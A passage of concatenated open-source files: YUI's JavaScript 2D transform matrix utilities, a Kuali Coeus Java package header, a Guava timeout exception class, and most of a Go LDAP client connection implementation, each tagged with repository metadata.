return val;
},
/**
* Converts a transform object to an array of column vectors.
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* \ /
*
* @method getnxn
* @return Array
*/
convertTransformToArray: function(matrix)
{
var matrixArray = [
[matrix.a, matrix.c, matrix.dx],
[matrix.b, matrix.d, matrix.dy],
[0, 0, 1]
];
return matrixArray;
},
/**
* Returns the determinant of a given matrix.
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* | matrix[0][3] matrix[1][3] matrix[2][3] |
* \ /
*
* @method getDeterminant
* @param {Array} matrix An nxn matrix represented an array of vector (column) arrays. Each vector array has index for each row.
* @return Number
*/
getDeterminant: function(matrix)
{
var determinant = 0,
len = matrix.length,
i = 0,
multiplier;
if(len == 2)
{
return matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0];
}
for(; i < len; ++i)
{
multiplier = matrix[i][0];
if(i % 2 === 0 || i === 0)
{
determinant += multiplier * MatrixUtil.getDeterminant(MatrixUtil.getMinors(matrix, i, 0));
}
else
{
determinant -= multiplier * MatrixUtil.getDeterminant(MatrixUtil.getMinors(matrix, i, 0));
}
}
return determinant;
},
/**
* Returns the inverse of a matrix
*
* @method inverse
* @param Array matrix An array representing an nxn matrix
* @return Array
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* | matrix[0][3] matrix[1][3] matrix[2][3] |
* \ /
*/
inverse: function(matrix)
{
var determinant = 0,
len = matrix.length,
i = 0,
j,
inverse,
adjunct = [],
//vector representing 2x2 matrix
minor = [];
if(len === 2)
{
determinant = matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0];
inverse = [
[matrix[1][1] * determinant, -matrix[1][0] * determinant],
[-matrix[0][1] * determinant, matrix[0][0] * determinant]
];
}
else
{
determinant = MatrixUtil.getDeterminant(matrix);
for(; i < len; ++i)
{
adjunct[i] = [];
for(j = 0; j < len; ++j)
{
minor = MatrixUtil.getMinors(matrix, j, i);
adjunct[i][j] = MatrixUtil.getDeterminant(minor);
if((i + j) % 2 !== 0 && (i + j) !== 0)
{
adjunct[i][j] *= -1;
}
}
}
inverse = MatrixUtil.scalarMultiply(adjunct, 1/determinant);
}
return inverse;
},
/**
* Multiplies a matrix by a numeric value.
*
* @method scalarMultiply
* @param {Array} matrix The matrix to be altered.
* @param {Number} multiplier The number to multiply against the matrix.
* @return Array
*/
scalarMultiply: function(matrix, multiplier)
{
var i = 0,
j,
len = matrix.length;
for(; i < len; ++i)
{
for(j = 0; j < len; ++j)
{
matrix[i][j] = MatrixUtil._round(matrix[i][j] * multiplier);
}
}
return matrix;
},
/**
* Returns the transpose for an nxn matrix.
*
* @method transpose
* @param matrix An nxn matrix represented by an array of vector arrays.
* @return Array
*/
transpose: function(matrix)
{
var len = matrix.length,
i = 0,
j = 0,
transpose = [];
for(; i < len; ++i)
{
transpose[i] = [];
for(j = 0; j < len; ++j)
{
transpose[i].push(matrix[j][i]);
}
}
return transpose;
},
/**
* Returns a matrix of minors based on a matrix, column index and row index.
*
* @method getMinors
* @param {Array} matrix The matrix from which to extract the matrix of minors.
* @param {Number} columnIndex A zero-based index representing the specified column to exclude.
* @param {Number} rowIndex A zero-based index represeenting the specified row to exclude.
* @return Array
*/
getMinors: function(matrix, columnIndex, rowIndex)
{
var minors = [],
len = matrix.length,
i = 0,
j,
column;
for(; i < len; ++i)
{
if(i !== columnIndex)
{
column = [];
for(j = 0; j < len; ++j)
{
if(j !== rowIndex)
{
column.push(matrix[i][j]);
}
}
minors.push(column);
}
}
return minors;
},
/**
* Returns the sign of value
*
* @method sign
* @param {Number} val value to be interpreted
* @return Number
*/
sign: function(val)
{
return val === 0 ? 1 : val/Math.abs(val);
},
/**
* Multiplies a vector and a matrix
*
* @method vectorMatrixProduct
* @param {Array} vector Array representing a column vector
* @param {Array} matrix Array representing an nxn matrix
* @return Array
*/
vectorMatrixProduct: function(vector, matrix)
{
var i,
j,
len = vector.length,
product = [],
rowProduct;
for(i = 0; i < len; ++i)
{
rowProduct = 0;
for(j = 0; j < len; ++j)
{
rowProduct += vector[i] * matrix[i][j];
}
product[i] = rowProduct;
}
return product;
},
/**
* Breaks up a 2d transform matrix into a series of transform operations.
*
* @method decompose
* @param {Array} 3x3 matrix array
* @return Array
*/
decompose: function(matrix)
{
var a = parseFloat(matrix[0][0]),
b = parseFloat(matrix[1][0]),
c = parseFloat(matrix[0][1]),
d = parseFloat(matrix[1][1]),
dx = parseFloat(matrix[0][2]),
dy = parseFloat(matrix[1][2]),
rotate,
sx,
sy,
shear;
if((a * d - b * c) === 0)
{
return false;
}
//get length of vector(ab)
sx = MatrixUtil._round(Math.sqrt(a * a + b * b));
//normalize components of vector(ab)
a /= sx;
b /= sx;
shear = MatrixUtil._round(a * c + b * d);
c -= a * shear;
d -= b * shear;
//get length of vector(cd)
sy = MatrixUtil._round(Math.sqrt(c * c + d * d));
//normalize components of vector(cd)
c /= sy;
d /= sy;
shear /=sy;
shear = MatrixUtil._round(MatrixUtil.rad2deg(Math.atan(shear)));
rotate = MatrixUtil._round(MatrixUtil.rad2deg(Math.atan2(matrix[1][0], matrix[0][0])));
return [
["translate", dx, dy],
["rotate", rotate],
["skewX", shear],
["scale", sx, sy]
];
},
/**
* Parses a transform string and returns an array of transform arrays.
*
* @method getTransformArray
* @param {String} val A transform string
* @return Array
*/
getTransformArray: function(transform) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
transforms = [],
args,
m,
decomp,
methods = MatrixUtil.transformMethods;
while ((m = re.exec(transform))) {
if (methods.hasOwnProperty(m[1]))
{
args = m[2].split(',');
args.unshift(m[1]);
transforms.push(args);
}
else if(m[1] == "matrix")
{
args = m[2].split(',');
decomp = MatrixUtil.decompose([
[args[0], args[2], args[4]],
[args[1], args[3], args[5]],
[0, 0, 1]
]);
transforms.push(decomp[0]);
transforms.push(decomp[1]);
transforms.push(decomp[2]);
transforms.push(decomp[3]);
}
}
return transforms;
},
/**
* Returns an array of transform arrays representing transform functions and arguments.
*
* @method getTransformFunctionArray
* @return Array
*/
getTransformFunctionArray: function(transform) {
var list;
switch(transform)
{
case "skew" :
list = [transform, 0, 0];
break;
case "scale" :
list = [transform, 1, 1];
break;
case "scaleX" :
list = [transform, 1];
break;
case "scaleY" :
list = [transform, 1];
break;
case "translate" :
list = [transform, 0, 0];
break;
default :
list = [transform, 0];
break;
}
return list;
},
/**
* Compares to arrays or transform functions to ensure both contain the same functions in the same
* order.
*
* @method compareTransformSequence
* @param {Array} list1 Array to compare
* @param {Array} list2 Array to compare
* @return Boolean
*/
compareTransformSequence: function(list1, list2)
{
var i = 0,
len = list1.length,
len2 = list2.length,
isEqual = len === len2;
if(isEqual)
{
for(; i < len; ++i)
{
if(list1[i][0] != list2[i][0])
{
isEqual = false;
break;
}
}
}
return isEqual;
},
/**
* Mapping of possible transform method names.
*
* @property transformMethods
* @type Object
*/
transformMethods: {
rotate: "rotate",
skew: "skew",
skewX: "skewX",
skewY: "skewY",
translate: "translate",
translateX: "translateX",
translateY: "tranlsateY",
scale: "scale",
scaleX: "scaleX",
scaleY: "scaleY"
}
};
Y.MatrixUtil = MatrixUtil;
/**
* Matrix is a class that allows for the manipulation of a transform matrix.
* This class is a work in progress.
*
* @class Matrix
* @constructor
* @module matrix
*/
var Matrix = function(config) {
this.init(config);
};
Matrix.prototype = {
/**
* Used as value for the _rounding method.
*
* @property _rounder
* @private
*/
_rounder: 100000,
/**
* Updates the matrix.
*
* @method multiple
* @param {Number} a
* @param {Number} b
* @param {Number} c
* @param {Number} d
* @param {Number} dx
* @param {Number} dy
*/
multiply: function(a, b, c, d, dx, dy) {
var matrix = this,
matrix_a = matrix.a * a + matrix.c * b,
matrix_b = matrix.b * a + matrix.d * b,
matrix_c = matrix.a * c + matrix.c * d,
matrix_d = matrix.b * c + matrix.d * d,
matrix_dx = matrix.a * dx + matrix.c * dy + matrix.dx,
matrix_dy = matrix.b * dx + matrix.d * dy + matrix.dy;
matrix.a = this._round(matrix_a);
matrix.b = this._round(matrix_b);
matrix.c = this._round(matrix_c);
matrix.d = this._round(matrix_d);
matrix.dx = this._round(matrix_dx);
matrix.dy = this._round(matrix_dy);
return this;
},
/**
* Parses a string and updates the matrix.
*
* @method applyCSSText
* @param {String} val A css transform string
*/
applyCSSText: function(val) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
args,
m;
val = val.replace(/matrix/g, "multiply");
while ((m = re.exec(val))) {
if (typeof this[m[1]] === 'function') {
args = m[2].split(',');
this[m[1]].apply(this, args);
}
}
},
/**
* Parses a string and returns an array of transform arrays.
*
* @method getTransformArray
* @param {String} val A css transform string
* @return Array
*/
getTransformArray: function(val) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
transforms = [],
args,
m;
val = val.replace(/matrix/g, "multiply");
while ((m = re.exec(val))) {
if (typeof this[m[1]] === 'function') {
args = m[2].split(',');
args.unshift(m[1]);
transforms.push(args);
}
}
return transforms;
},
/**
* Default values for the matrix
*
* @property _defaults
* @private
*/
_defaults: {
a: 1,
b: 0,
c: 0,
d: 1,
dx: 0,
dy: 0
},
/**
* Rounds values
*
* @method _round
* @private
*/
_round: function(val) {
val = Math.round(val * this._rounder) / this._rounder;
return val;
},
/**
* Initializes a matrix.
*
* @method init
* @param {Object} config Specified key value pairs for matrix properties. If a property is not explicitly defined in the config argument,
* the default value will be used.
*/
init: function(config) {
var defaults = this._defaults,
prop;
config = config || {};
for (prop in defaults) {
if(defaults.hasOwnProperty(prop))
{
this[prop] = (prop in config) ? config[prop] : defaults[prop];
}
}
this._config = config;
},
/**
* Applies a scale transform
*
* @method scale
* @param {Number} val
*/
scale: function(x, y) {
this.multiply(x, 0, 0, y, 0, 0);
return this;
},
/**
* Applies a skew transformation.
*
* @method skew
* @param {Number} x The value to skew on the x-axis.
* @param {Number} y The value to skew on the y-axis.
*/
skew: function(x, y) {
x = x || 0;
y = y || 0;
if (x !== undefined) { // null or undef
x = Math.tan(this.angle2rad(x));
}
if (y !== undefined) { // null or undef
y = Math.tan(this.angle2rad(y));
}
this.multiply(1, y, x, 1, 0, 0);
return this;
},
/**
* Applies a skew to the x-coordinate
*
* @method skewX
* @param {Number} x x-coordinate
*/
skewX: function(x) {
this.skew(x);
return this;
},
/**
* Applies a skew to the y-coordinate
*
* @method skewY
* @param {Number} y y-coordinate
*/
skewY: function(y) {
this.skew(null, y);
return this;
},
/**
* Returns a string of text that can be used to populate a the css transform property of an element.
*
* @method toCSSText
* @return String
*/
toCSSText: function() {
var matrix = this,
text = 'matrix(' +
matrix.a + ',' +
matrix.b + ',' +
matrix.c + ',' +
matrix.d + ',' +
matrix.dx + ',' +
matrix.dy + ')';
return text;
},
/**
* Returns a string that can be used to populate the css filter property of an element.
*
* @method toFilterText
* @return String
*/
toFilterText: function() {
var matrix = this,
text = 'progid:DXImageTransform.Microsoft.Matrix(';
text += 'M11=' + matrix.a + ',' +
'M21=' + matrix.b + ',' +
'M12=' + matrix.c + ',' +
'M22=' + matrix.d + ',' +
'sizingMethod="auto expand")';
text += '';
return text;
},
/**
* Converts a radian value to a degree.
*
* @method rad2deg
* @param {Number} rad Radian value to be converted.
* @return Number
*/
rad2deg: function(rad) {
var deg = rad * (180 / Math.PI);
return deg;
},
/**
* Converts a degree value to a radian.
*
* @method deg2rad
* @param {Number} deg Degree value to be converted to radian.
* @return Number
*/
deg2rad: function(deg) {
var rad = deg * (Math.PI / 180);
return rad;
},
angle2rad: function(val) {
if (typeof val === 'string' && val.indexOf('rad') > -1) {
val = parseFloat(val);
} else { // default to deg
val = this.deg2rad(parseFloat(val));
}
return val;
},
/**
* Applies a rotate transform.
*
* @method rotate
* @param {Number} deg The degree of the rotation.
*/
rotate: function(deg, x, y) {
var rad = this.angle2rad(deg),
sin = Math.sin(rad),
cos = Math.cos(rad);
this.multiply(cos, sin, 0 - sin, cos, 0, 0);
return this;
},
/**
* Applies translate transformation.
*
* @method translate
* @param {Number} x The value to transate on the x-axis.
* @param {Number} y The value to translate on the y-axis.
*/
translate: function(x, y) {
x = parseFloat(x) || 0;
y = parseFloat(y) || 0;
this.multiply(1, 0, 0, 1, x, y);
return this;
},
/**
* Applies a translate to the x-coordinate
*
* @method translateX
* @param {Number} x x-coordinate
*/
translateX: function(x) {
this.translate(x);
return this;
},
/**
* Applies a translate to the y-coordinate
*
* @method translateY
* @param {Number} y y-coordinate
*/
translateY: function(y) {
this.translate(null, y);
return this;
},
/**
* Returns an identity matrix.
*
* @method identity
* @return Object
*/
identity: function() {
var config = this._config,
defaults = this._defaults,
prop;
for (prop in config) {
if (prop in defaults) {
this[prop] = defaults[prop];
}
}
return this;
},
/**
* Returns a 3x3 Matrix array
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* \ /
*
* @method getMatrixArray
* @return Array
*/
getMatrixArray: function()
{
var matrix = this,
matrixArray = [
[matrix.a, matrix.c, matrix.dx],
[matrix.b, matrix.d, matrix.dy],
[0, 0, 1]
];
return matrixArray;
},
/**
* Returns the left, top, right and bottom coordinates for a transformed
* item.
*
* @method getContentRect
* @param {Number} width The width of the item.
* @param {Number} height The height of the item.
* @param {Number} x The x-coordinate of the item.
* @param {Number} y The y-coordinate of the item.
* @return Object
*/
getContentRect: function(width, height, x, y)
{
var left = !isNaN(x) ? x : 0,
top = !isNaN(y) ? y : 0,
right = left + width,
bottom = top + height,
matrix = this,
a = matrix.a,
b = matrix.b,
c = matrix.c,
d = matrix.d,
dx = matrix.dx,
dy = matrix.dy,
x1 = (a * left + c * top + dx),
y1 = (b * left + d * top + dy),
//[x2, y2]
x2 = (a * right + c * top + dx),
y2 = (b * right + d * top + dy),
//[x3, y3]
x3 = (a * left + c * bottom + dx),
y3 = (b * left + d * bottom + dy),
//[x4, y4]
x4 = (a * right + c * bottom + dx),
y4 = (b * right + d * bottom + dy);
return {
left: Math.min(x3, Math.min(x1, Math.min(x2, x4))),
right: Math.max(x3, Math.max(x1, Math.max(x2, x4))),
top: Math.min(y2, Math.min(y4, Math.min(y3, y1))),
bottom: Math.max(y2, Math.max(y4, Math.max(y3, y1)))
};
},
/**
* Returns the determinant of the matrix.
*
* @method getDeterminant
* @return Number
*/
getDeterminant: function()
{
return Y.MatrixUtil.getDeterminant(this.getMatrixArray());
},
/**
* Returns the inverse (in array form) of the matrix.
*
* @method inverse
* @return Array
*/
inverse: function()
{
return Y.MatrixUtil.inverse(this.getMatrixArray());
},
/**
* Returns the transpose of the matrix
*
* @method transpose
* @return Array
*/
transpose: function()
{
return Y.MatrixUtil.transpose(this.getMatrixArray());
},
/**
* Returns an array of transform commands that represent the matrix.
*
* @method decompose
* @return Array
*/
decompose: function()
{
return Y.MatrixUtil.decompose(this.getMatrixArray());
}
};
Y.Matrix = Matrix;
}, '3.11.0', {"requires": ["yui-base"]});
| devmix/openjst | server/commons/war/src/main/webapp/ui/lib/yui/build/matrix/matrix.js | JavaScript | agpl-3.0 | 26,090 |
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2016 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
*
* Kuali Coeus Common Framework
*
* @author Kuali Coeus Development Team
*
*/
package org.kuali.coeus.common.framework;
| mukadder/kc | coeus-impl/src/main/java/org/kuali/coeus/common/framework/package-info.java | Java | agpl-3.0 | 937 |
/*
* Copyright (C) 2006 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google_voltpatches.common.util.concurrent;
import com.google_voltpatches.common.annotations.GwtIncompatible;
import javax.annotation_voltpatches.Nullable;
/**
* Unchecked version of {@link java.util.concurrent.TimeoutException}.
*
* @author Kevin Bourrillion
* @since 1.0
*/
@GwtIncompatible
public class UncheckedTimeoutException extends RuntimeException {
public UncheckedTimeoutException() {}
public UncheckedTimeoutException(@Nullable String message) {
super(message);
}
public UncheckedTimeoutException(@Nullable Throwable cause) {
super(cause);
}
public UncheckedTimeoutException(@Nullable String message, @Nullable Throwable cause) {
super(message, cause);
}
private static final long serialVersionUID = 0;
}
| migue/voltdb | third_party/java/src/com/google_voltpatches/common/util/concurrent/UncheckedTimeoutException.java | Java | agpl-3.0 | 1,363 |
package ldap
import (
"bufio"
"crypto/tls"
"errors"
"fmt"
"log"
"net"
"net/url"
"sync"
"sync/atomic"
"time"
ber "github.com/go-asn1-ber/asn1-ber"
)
const (
// MessageQuit causes the processMessages loop to exit
MessageQuit = 0
// MessageRequest sends a request to the server
MessageRequest = 1
// MessageResponse receives a response from the server
MessageResponse = 2
// MessageFinish indicates the client considers a particular message ID to be finished
MessageFinish = 3
// MessageTimeout indicates the client-specified timeout for a particular message ID has been reached
MessageTimeout = 4
)
const (
// DefaultLdapPort default ldap port for pure TCP connection
DefaultLdapPort = "389"
// DefaultLdapsPort default ldap port for SSL connection
DefaultLdapsPort = "636"
)
// PacketResponse contains the packet or error encountered reading a response
type PacketResponse struct {
// Packet is the packet read from the server
Packet *ber.Packet
// Error is an error encountered while reading
Error error
}
// ReadPacket returns the packet or an error
func (pr *PacketResponse) ReadPacket() (*ber.Packet, error) {
if (pr == nil) || (pr.Packet == nil && pr.Error == nil) {
return nil, NewError(ErrorNetwork, errors.New("ldap: could not retrieve response"))
}
return pr.Packet, pr.Error
}
type messageContext struct {
id int64
// close(done) should only be called from finishMessage()
done chan struct{}
// close(responses) should only be called from processMessages(), and only sent to from sendResponse()
responses chan *PacketResponse
}
// sendResponse should only be called within the processMessages() loop which
// is also responsible for closing the responses channel.
func (msgCtx *messageContext) sendResponse(packet *PacketResponse) {
select {
case msgCtx.responses <- packet:
// Successfully sent packet to message handler.
case <-msgCtx.done:
// The request handler is done and will not receive more
// packets.
}
}
type messagePacket struct {
Op int
MessageID int64
Packet *ber.Packet
Context *messageContext
}
type sendMessageFlags uint
const (
startTLS sendMessageFlags = 1 << iota
)
// Conn represents an LDAP Connection
type Conn struct {
// requestTimeout is loaded atomically
// so we need to ensure 64-bit alignment on 32-bit platforms.
requestTimeout int64
conn net.Conn
isTLS bool
closing uint32
closeErr atomic.Value
isStartingTLS bool
Debug debugging
chanConfirm chan struct{}
messageContexts map[int64]*messageContext
chanMessage chan *messagePacket
chanMessageID chan int64
wgClose sync.WaitGroup
outstandingRequests uint
messageMutex sync.Mutex
}
var _ Client = &Conn{}
// DefaultTimeout is a package-level variable that sets the timeout value
// used for the Dial and DialTLS methods.
//
// WARNING: since this is a package-level variable, setting this value from
// multiple places will probably result in undesired behaviour.
var DefaultTimeout = 60 * time.Second
// DialOpt configures DialContext.
type DialOpt func(*DialContext)
// DialWithDialer updates net.Dialer in DialContext.
func DialWithDialer(d *net.Dialer) DialOpt {
return func(dc *DialContext) {
dc.d = d
}
}
// DialWithTLSConfig updates tls.Config in DialContext.
func DialWithTLSConfig(tc *tls.Config) DialOpt {
return func(dc *DialContext) {
dc.tc = tc
}
}
// DialWithTLSDialer is a wrapper for DialWithTLSConfig with the option to
// specify a net.Dialer to for example define a timeout or a custom resolver.
func DialWithTLSDialer(tlsConfig *tls.Config, dialer *net.Dialer) DialOpt {
return func(dc *DialContext) {
dc.tc = tlsConfig
dc.d = dialer
}
}
// DialContext contains necessary parameters to dial the given ldap URL.
type DialContext struct {
d *net.Dialer
tc *tls.Config
}
func (dc *DialContext) dial(u *url.URL) (net.Conn, error) {
if u.Scheme == "ldapi" {
if u.Path == "" || u.Path == "/" {
u.Path = "/var/run/slapd/ldapi"
}
return dc.d.Dial("unix", u.Path)
}
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
// we assume that error is due to missing port
host = u.Host
port = ""
}
switch u.Scheme {
case "ldap":
if port == "" {
port = DefaultLdapPort
}
return dc.d.Dial("tcp", net.JoinHostPort(host, port))
case "ldaps":
if port == "" {
port = DefaultLdapsPort
}
return tls.DialWithDialer(dc.d, "tcp", net.JoinHostPort(host, port), dc.tc)
}
return nil, fmt.Errorf("Unknown scheme '%s'", u.Scheme)
}
// Dial connects to the given address on the given network using net.Dial
// and then returns a new Conn for the connection.
// @deprecated Use DialURL instead.
func Dial(network, addr string) (*Conn, error) {
c, err := net.DialTimeout(network, addr, DefaultTimeout)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
conn := NewConn(c, false)
conn.Start()
return conn, nil
}
// DialTLS connects to the given address on the given network using tls.Dial
// and then returns a new Conn for the connection.
// @deprecated Use DialURL instead.
func DialTLS(network, addr string, config *tls.Config) (*Conn, error) {
c, err := tls.DialWithDialer(&net.Dialer{Timeout: DefaultTimeout}, network, addr, config)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
conn := NewConn(c, true)
conn.Start()
return conn, nil
}
// DialURL connects to the given ldap URL.
// The following schemas are supported: ldap://, ldaps://, ldapi://.
// On success a new Conn for the connection is returned.
func DialURL(addr string, opts ...DialOpt) (*Conn, error) {
u, err := url.Parse(addr)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
var dc DialContext
for _, opt := range opts {
opt(&dc)
}
if dc.d == nil {
dc.d = &net.Dialer{Timeout: DefaultTimeout}
}
c, err := dc.dial(u)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
conn := NewConn(c, u.Scheme == "ldaps")
conn.Start()
return conn, nil
}
// NewConn returns a new Conn using conn for network I/O.
func NewConn(conn net.Conn, isTLS bool) *Conn {
return &Conn{
conn: conn,
chanConfirm: make(chan struct{}),
chanMessageID: make(chan int64),
chanMessage: make(chan *messagePacket, 10),
messageContexts: map[int64]*messageContext{},
requestTimeout: 0,
isTLS: isTLS,
}
}
// Start initializes goroutines to read responses and process messages
func (l *Conn) Start() {
l.wgClose.Add(1)
go l.reader()
go l.processMessages()
}
// IsClosing returns whether or not we're currently closing.
func (l *Conn) IsClosing() bool {
return atomic.LoadUint32(&l.closing) == 1
}
// setClosing sets the closing value to true
func (l *Conn) setClosing() bool {
return atomic.CompareAndSwapUint32(&l.closing, 0, 1)
}
// Close closes the connection.
func (l *Conn) Close() {
l.messageMutex.Lock()
defer l.messageMutex.Unlock()
if l.setClosing() {
l.Debug.Printf("Sending quit message and waiting for confirmation")
l.chanMessage <- &messagePacket{Op: MessageQuit}
<-l.chanConfirm
close(l.chanMessage)
l.Debug.Printf("Closing network connection")
if err := l.conn.Close(); err != nil {
log.Println(err)
}
l.wgClose.Done()
}
l.wgClose.Wait()
}
// SetTimeout sets the time after a request is sent that a MessageTimeout triggers
func (l *Conn) SetTimeout(timeout time.Duration) {
if timeout > 0 {
atomic.StoreInt64(&l.requestTimeout, int64(timeout))
}
}
// Returns the next available messageID
func (l *Conn) nextMessageID() int64 {
if messageID, ok := <-l.chanMessageID; ok {
return messageID
}
return 0
}
// StartTLS sends the command to start a TLS session and then creates a new TLS Client
func (l *Conn) StartTLS(config *tls.Config) error {
if l.isTLS {
return NewError(ErrorNetwork, errors.New("ldap: already encrypted"))
}
packet := ber.Encode(ber.ClassUniversal, ber.TypeConstructed, ber.TagSequence, nil, "LDAP Request")
packet.AppendChild(ber.NewInteger(ber.ClassUniversal, ber.TypePrimitive, ber.TagInteger, l.nextMessageID(), "MessageID"))
request := ber.Encode(ber.ClassApplication, ber.TypeConstructed, ApplicationExtendedRequest, nil, "Start TLS")
request.AppendChild(ber.NewString(ber.ClassContext, ber.TypePrimitive, 0, "1.3.6.1.4.1.1466.20037", "TLS Extended Command"))
packet.AppendChild(request)
l.Debug.PrintPacket(packet)
msgCtx, err := l.sendMessageWithFlags(packet, startTLS)
if err != nil {
return err
}
defer l.finishMessage(msgCtx)
l.Debug.Printf("%d: waiting for response", msgCtx.id)
packetResponse, ok := <-msgCtx.responses
if !ok {
return NewError(ErrorNetwork, errors.New("ldap: response channel closed"))
}
packet, err = packetResponse.ReadPacket()
l.Debug.Printf("%d: got response %p", msgCtx.id, packet)
if err != nil {
return err
}
if l.Debug {
if err := addLDAPDescriptions(packet); err != nil {
l.Close()
return err
}
l.Debug.PrintPacket(packet)
}
if err := GetLDAPError(packet); err == nil {
conn := tls.Client(l.conn, config)
if connErr := conn.Handshake(); connErr != nil {
l.Close()
return NewError(ErrorNetwork, fmt.Errorf("TLS handshake failed (%v)", connErr))
}
l.isTLS = true
l.conn = conn
} else {
return err
}
go l.reader()
return nil
}
// TLSConnectionState returns the client's TLS connection state.
// The return values are their zero values if StartTLS did
// not succeed.
func (l *Conn) TLSConnectionState() (state tls.ConnectionState, ok bool) {
tc, ok := l.conn.(*tls.Conn)
if !ok {
return
}
return tc.ConnectionState(), true
}
func (l *Conn) sendMessage(packet *ber.Packet) (*messageContext, error) {
return l.sendMessageWithFlags(packet, 0)
}
func (l *Conn) sendMessageWithFlags(packet *ber.Packet, flags sendMessageFlags) (*messageContext, error) {
if l.IsClosing() {
return nil, NewError(ErrorNetwork, errors.New("ldap: connection closed"))
}
l.messageMutex.Lock()
l.Debug.Printf("flags&startTLS = %d", flags&startTLS)
if l.isStartingTLS {
l.messageMutex.Unlock()
return nil, NewError(ErrorNetwork, errors.New("ldap: connection is in startls phase"))
}
if flags&startTLS != 0 {
if l.outstandingRequests != 0 {
l.messageMutex.Unlock()
return nil, NewError(ErrorNetwork, errors.New("ldap: cannot StartTLS with outstanding requests"))
}
l.isStartingTLS = true
}
l.outstandingRequests++
l.messageMutex.Unlock()
responses := make(chan *PacketResponse)
messageID := packet.Children[0].Value.(int64)
message := &messagePacket{
Op: MessageRequest,
MessageID: messageID,
Packet: packet,
Context: &messageContext{
id: messageID,
done: make(chan struct{}),
responses: responses,
},
}
if !l.sendProcessMessage(message) {
if l.IsClosing() {
return nil, NewError(ErrorNetwork, errors.New("ldap: connection closed"))
}
return nil, NewError(ErrorNetwork, errors.New("ldap: could not send message for unknown reason"))
}
return message.Context, nil
}
func (l *Conn) finishMessage(msgCtx *messageContext) {
close(msgCtx.done)
if l.IsClosing() {
return
}
l.messageMutex.Lock()
l.outstandingRequests--
if l.isStartingTLS {
l.isStartingTLS = false
}
l.messageMutex.Unlock()
message := &messagePacket{
Op: MessageFinish,
MessageID: msgCtx.id,
}
l.sendProcessMessage(message)
}
func (l *Conn) sendProcessMessage(message *messagePacket) bool {
l.messageMutex.Lock()
defer l.messageMutex.Unlock()
if l.IsClosing() {
return false
}
l.chanMessage <- message
return true
}
func (l *Conn) processMessages() {
defer func() {
if err := recover(); err != nil {
log.Printf("ldap: recovered panic in processMessages: %v", err)
}
for messageID, msgCtx := range l.messageContexts {
// If we are closing due to an error, inform anyone who
// is waiting about the error.
if l.IsClosing() && l.closeErr.Load() != nil {
msgCtx.sendResponse(&PacketResponse{Error: l.closeErr.Load().(error)})
}
l.Debug.Printf("Closing channel for MessageID %d", messageID)
close(msgCtx.responses)
delete(l.messageContexts, messageID)
}
close(l.chanMessageID)
close(l.chanConfirm)
}()
var messageID int64 = 1
for {
select {
case l.chanMessageID <- messageID:
messageID++
case message := <-l.chanMessage:
switch message.Op {
case MessageQuit:
l.Debug.Printf("Shutting down - quit message received")
return
case MessageRequest:
// Add to message list and write to network
l.Debug.Printf("Sending message %d", message.MessageID)
buf := message.Packet.Bytes()
_, err := l.conn.Write(buf)
if err != nil {
l.Debug.Printf("Error Sending Message: %s", err.Error())
message.Context.sendResponse(&PacketResponse{Error: fmt.Errorf("unable to send request: %s", err)})
close(message.Context.responses)
break
}
// Only add to messageContexts if we were able to
// successfully write the message.
l.messageContexts[message.MessageID] = message.Context
// Add timeout if defined
requestTimeout := time.Duration(atomic.LoadInt64(&l.requestTimeout))
if requestTimeout > 0 {
go func() {
defer func() {
if err := recover(); err != nil {
log.Printf("ldap: recovered panic in RequestTimeout: %v", err)
}
}()
time.Sleep(requestTimeout)
timeoutMessage := &messagePacket{
Op: MessageTimeout,
MessageID: message.MessageID,
}
l.sendProcessMessage(timeoutMessage)
}()
}
case MessageResponse:
l.Debug.Printf("Receiving message %d", message.MessageID)
if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
msgCtx.sendResponse(&PacketResponse{message.Packet, nil})
} else {
log.Printf("Received unexpected message %d, %v", message.MessageID, l.IsClosing())
l.Debug.PrintPacket(message.Packet)
}
case MessageTimeout:
// Handle the timeout by closing the channel
// All reads will return immediately
if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
l.Debug.Printf("Receiving message timeout for %d", message.MessageID)
msgCtx.sendResponse(&PacketResponse{message.Packet, NewError(ErrorNetwork, errors.New("ldap: connection timed out"))})
delete(l.messageContexts, message.MessageID)
close(msgCtx.responses)
}
case MessageFinish:
l.Debug.Printf("Finished message %d", message.MessageID)
